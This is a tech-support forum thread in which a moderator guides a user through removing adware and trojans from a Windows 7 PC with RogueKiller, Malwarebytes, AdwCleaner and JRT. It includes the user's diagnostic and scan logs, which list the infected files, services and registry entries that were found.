    FirewallRules: [{4A3B0CB3-A9F4-45DB-9CF0-9E288759D153}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
    FirewallRules: [{037CACFD-45F4-4DEF-A4D3-78D3A94AD23D}] => (Allow) C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe
    FirewallRules: [{98DA30AA-9CE5-4AD2-9F80-1C6FEBEC6E48}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
    FirewallRules: [{1C0FC520-E3B9-41D0-8E66-F63F89BE6292}] => (Allow) C:\WINDOWS\system32\rundll32.exe
    FirewallRules: [{457C41B8-717F-4BD8-B4C2-5EDE2E665A64}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [{9F6100EB-1481-4E36-A4CA-186F76D0AAD6}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [{AB0B0862-EEE3-44D7-8D76-F5389278FF4E}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\mininews.exe
    FirewallRules: [{D3272B68-A58B-4BE4-BFB4-A1E81F7012E4}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\mininews.exe
    FirewallRules: [{5D065EAD-6D1C-4570-AC79-6ABE9ACA89FB}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [{3DD5DD0D-AB20-499F-B80E-A45E37A4E06E}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe

    ==================== Restore Points =========================

    ATTENTION: System Restore is disabled

    ==================== Faulty Device Manager Devices =============

    Name: bsdpr64 service
    Description: bsdpr64 service
    Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    Manufacturer:
    Service: bsdpr64
    Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
    Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
    Devices stay in this state if they have been prepared for removal.
    After you remove the device, this error disappears.Remove the device, and this error should be resolved.

    Name: ComputerZLock
    Description: ComputerZLock
    Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    Manufacturer:
    Service: ComputerZLock
    Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
    Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
    Devices stay in this state if they have been prepared for removal.
    After you remove the device, this error disappears.Remove the device, and this error should be resolved.


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (09/18/2016 11:29:30 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    Error: (09/18/2016 11:28:11 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:26:54 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    Error: (09/18/2016 11:25:38 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:22:44 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    Error: (09/18/2016 11:21:20 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:18:53 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:12:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    Error: (09/18/2016 11:10:40 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:08:59 AM) (Source: SideBySide) (EventID: 35) (User: )
    Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
    Component identity found in manifest does not match the identity of the component requested.
    Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
    Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
    Please use sxstrace.exe for detailed diagnosis.


    System errors:
    =============
    Error: (09/18/2016 11:29:22 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
    Description: The following boot-start or system-start driver(s) failed to load:
    bsdpf64
    bsdpr64

    Error: (09/18/2016 11:29:22 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
    Description: The CloudPrinter service hung on starting.

    Error: (09/18/2016 11:29:22 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
    Description: The Background Logic Handler service hung on starting.

    Error: (09/18/2016 11:28:01 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Search Protect Service service failed to start due to the following error:
    The system cannot find the file specified.

    Error: (09/18/2016 11:27:57 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The ByteFence Security Real-time Protection service failed to start due to the following error:
    The system cannot find the file specified.

    Error: (09/18/2016 11:27:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
    Description: The Kuaizip Update Checker service terminated with the following error:
    The specified module could not be found.

    Error: (09/18/2016 11:27:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
    Description: The Hardware Protection Service service terminated with the following error:
    The specified module could not be found.

    Error: (09/18/2016 11:27:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The FastCompress service failed to start due to the following error:
    The system cannot find the file specified.

    Error: (09/18/2016 11:27:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The ComputerZLock service failed to start due to the following error:
    The system cannot find the path specified.

    Error: (09/18/2016 11:26:50 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
    Description: The following boot-start or system-start driver(s) failed to load:
    bsdpf64
    bsdpr64


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz
    Percentage of memory in use: 44%
    Total physical RAM: 3994.27 MB
    Available physical RAM: 2201.48 MB
    Total Virtual: 7986.71 MB
    Available Virtual: 6072.44 MB

    ==================== Drives ================================

    Drive c: (OSDisk) (Fixed) (Total:298.09 GB) (Free:230.93 GB) NTFS ==>[drive with boot components (obtained from BCD)]

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 6CEA704A)
    Partition 1: (Active) - (Size=298.1 GB) - (Type=07 NTFS)

    ==================== End of Addition.txt ============================
     
  3. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    Please observe the following rules:
    • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
    • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

    ================================

    There is a lot of infection.
    You can't skip any lines.
    If the log doesn't fit, split it between more replies.

    Uninstall the following unwanted programs:

    SafeFinder
    Setup


    Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2

    • Close all the running programs
    • Double click on the downloaded setup.exe file to install the program.
    • Click on Start Scan button.
    • Click on another Start Scan button.
    • Wait until the Status box shows Scan Finished
    • Click on Delete.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.

    Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
    NOTE. If you already have MBAM 2.0 installed scroll down.
    • Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
    • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
    • Click Finish.
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.

    If you already have MBAM 2.0 installed:
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.

    How to get logs:
    (Export log to save as txt)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Export'.
    • Click 'Text file (*.txt)'
    • In the Save File dialog box which appears, click on Desktop.
    • In the File name: box type a name for your scan log.
    • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
    • Click Ok
    • Attach that saved log to your next reply.
    (Copy to clipboard for pasting into forum replies or tickets)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Copy to Clipboard'
    • Paste the contents of the clipboard into your reply.

    Please download AdwCleaner by Xplode onto your desktop.
    • Close all open programs and internet browsers.
    • Double click on adwcleaner.exe to run the tool.
    • Click on Scan button.
    • When the scan has finished click on Clean button.
    • Your computer will be rebooted automatically. A text file will open after the restart.
    • Please post the contents of that logfile with your next reply.
    • You can find the logfile at C:\AdwCleaner[S1].txt as well.

    Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
  4. photiost

    photiost Established Techie7 Member

    I have tried to uninstall Safefinder and it won't let me ... there are actually 2 SafeFinders installed ... I can't uninstall either one ..

    I will try and uninstall Setup now..
     
  5. photiost

    photiost Established Techie7 Member

    Tried to uninstall Safefinder again and it won't let me ... also Setup is not listed ..

    Can I continue with Rogue Killer?
     
    Last edited: Sep 19, 2016
  6. photiost

    photiost Established Techie7 Member

    RogueKiller V12.6.2.0 (x64) [Sep 12 2016] (Free) by Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : http://forum.adlice.com
    Website : http://www.adlice.com/download/roguekiller/
    Blog : http://www.adlice.com

    Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
    Started in : Normal mode
    User : Administrator [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Mode : Delete -- Date : 09/18/2016 19:22:48 (Duration : 00:27:58)

    ¤¤¤ Processes : 14 ¤¤¤
    [PUP|VT.PUP.Optional.LogicHandler] set.exe(1532) -- C:\ProgramData\Logic Handler\set.exe[-] -> Killed [TermProc]
    [PUP|Proc.Injected|VT.PUP.Optional.Linkury] CloudPrinter.exe(1540) -- C:\ProgramData\CloudPrinter\CloudPrinter.exe[-] -> Killed [TermProc]
    [PUP|VT.HEUR:Trojan.Win32.Generic] abril.exe(2508) -- C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe[-] -> Killed [TermProc]
    [PUP|Proc.Injected|VT.PUP.Optional.Linkury] Ronzap.exe(2212) -- C:\ProgramData\Ronzap\Ronzap.exe[-] -> Killed [TermProc]
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] knskAF7C.tmpfs(2356) -- C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs[-] -> Killed [TermProc]
    [Suspicious.Path|VT.SoftwareBundler:Win32/Pokavampo] qnsaF06.tmp(3080) -- C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp[-] -> Killed [TermThr]
    [Proc.Injected] firefox.exe(4784) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe[7] -> Killed [TermProc]
    [Suspicious.Path|VT.Unknown] misgua.dll(2412) -- C:\Users\Administrator\AppData\Local\misgua.dll[-] -> Found
    [PUP|VT.PUP.Optional.LogicHandler] (SVC) backlh -- C:\ProgramData\Logic Handler\set.exe[-] -> Stopped
    [PUP|VT.PUP.Optional.Linkury] (SVC) CloudPrinter -- C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a[-] -> Stopped
    [PUP|VT.HEUR:Trojan.Win32.Generic] (SVC) ProntSpooler -- "C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe"[-] -> Stopped
    [PUP|VT.PUP.Optional.Linkury] (SVC) Ronzap -- C:\ProgramData\\Ronzap\\Ronzap.exe shuz -f "C:\ProgramData\\Ronzap\\Ronzap.dat" -l -a[-] -> Stopped
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] (SVC) xytekyby -- C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs[-] -> Stopped
    [PUP|VT.SoftwareBundler:Win32/Pokavampo] (SVC) zigipyro -- C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp[-] -> Stopped

    ¤¤¤ Registry : 114 ¤¤¤
    [PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{08ACFB57-8187-47f0-AF93-56360D03634A} -> Not selected
    [Suspicious.Path] (X64) HKEY_CLASSES_ROOT\CLSID\{C98AAA6B-FBAC-4FE5-A815-0D3A4176DA64} (C:\Users\ADMINI~1\AppData\Local\Temp\Tools\x64\Microsoft.BDD.Utility.dll) -> Not selected
    [PUP] (X64) HKEY_CLASSES_ROOT\PCSU.Registry -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\SearchModule -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\Wizzwifihotspot -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\Xtp -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\FastCompress-Zip -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\K9Tools -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\mtRonzap -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SearchModule -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SearchProtect -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SlimWare Utilities Inc -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SlimWare Utilities, Inc. -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SPPDCOM -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Tutorials -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Xtp -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\csastats -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\FastCompress-Zip -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\K9Tools -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\osTip -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\ProductSetup -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SlimWare Utilities Inc -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SNDA -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\System Healer -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Tutorials -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\TutoTag -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Wizzlabs -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\csastats -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\FastCompress-Zip -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\K9Tools -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\osTip -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\ProductSetup -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SlimWare Utilities Inc -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SNDA -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\System Healer -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Tutorials -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\TutoTag -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Wizzlabs -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\AppTrailers -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\WikiZ -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\AppTrailers -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\WikiZ -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC} -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | EasyHotspot : "C:\Program Files (x86)\EasyHotspot\EasyHotspot.exe" [x] -> Not selected
    [Suspicious.Path|VT.Proxy.BPIN] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Run | misgua : rundll32.exe "C:\Users\Administrator\AppData\Local\misgua.dll",misgua [-] -> Deleted
    [Suspicious.Path|VT.DDoS:Win32/Flusihoc.A] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Run | Pritc : C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe [-] -> Deleted
    [Suspicious.Path|VT.Proxy.BPIN] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Run | misgua : rundll32.exe "C:\Users\Administrator\AppData\Local\misgua.dll",misgua [-] -> ERROR [2]
    [Suspicious.Path|VT.DDoS:Win32/Flusihoc.A] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Run | Pritc : C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe [-] -> ERROR [2]
    [PUP|Suspicious.Path|VT.PUP.Optional.LogicHandler] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\backlh (C:\ProgramData\Logic Handler\set.exe) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bsdpf64 (\??\C:\WINDOWS\system32\Drivers\bsdpf64.sys) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bsdpr64 (\??\C:\WINDOWS\system32\Drivers\bsdpr64.sys) -> Not selected
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CloudPrinter (C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CltMngSvc (C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe) -> Not selected
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeskTop_E (C:\ProgramData\desktopfindkey\desktop189.exe) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FastCompress (C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe) -> Not selected
    [PUP|Suspicious.Path|VT.HEUR:Trojan.Win32.Generic] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ProntSpooler ("C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe") -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Ronzap (C:\ProgramData\\Ronzap\\Ronzap.exe shuz -f "C:\ProgramData\\Ronzap\\Ronzap.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rtop ("C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe") -> Not selected
    [PUP|VT.PUP.Optional.SearchModule] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SMUpd (C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe /service) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SWDUMon (system32\DRIVERS\SWDUMon.sys) -> Not selected
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\xytekyby (C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs) -> Deleted
    [PUP|Suspicious.Path|VT.SoftwareBundler:Win32/Pokavampo] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\zigipyro (C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp) -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.LogicHandler] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\backlh (C:\ProgramData\Logic Handler\set.exe) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\bsdpf64 (\??\C:\WINDOWS\system32\Drivers\bsdpf64.sys) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\bsdpr64 (\??\C:\WINDOWS\system32\Drivers\bsdpr64.sys) -> Not selected
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\CloudPrinter (C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\CltMngSvc (C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe) -> Not selected
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\DeskTop_E (C:\ProgramData\desktopfindkey\desktop189.exe) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\FastCompress (C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe) -> Not selected
    [PUP|Suspicious.Path|VT.HEUR:Trojan.Win32.Generic] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\ProntSpooler ("C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe") -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Ronzap (C:\ProgramData\\Ronzap\\Ronzap.exe shuz -f "C:\ProgramData\\Ronzap\\Ronzap.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\rtop ("C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe") -> Not selected
    [PUP|VT.PUP.Optional.SearchModule] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SMUpd (C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe /service) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SWDUMon (system32\DRIVERS\SWDUMon.sys) -> Not selected
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\xytekyby (C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs) -> Deleted
    [PUP|Suspicious.Path|VT.SoftwareBundler:Win32/Pokavampo] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\zigipyro (C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp) -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.LogicHandler] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\backlh (C:\ProgramData\Logic Handler\set.exe) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\bsdpf64 (\??\C:\WINDOWS\system32\Drivers\bsdpf64.sys) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\bsdpr64 (\??\C:\WINDOWS\system32\Drivers\bsdpr64.sys) -> Not selected
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\CloudPrinter (C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\CltMngSvc (C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe) -> Not selected
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\DeskTop_E (C:\ProgramData\desktopfindkey\desktop189.exe) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\FastCompress (C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe) -> Not selected
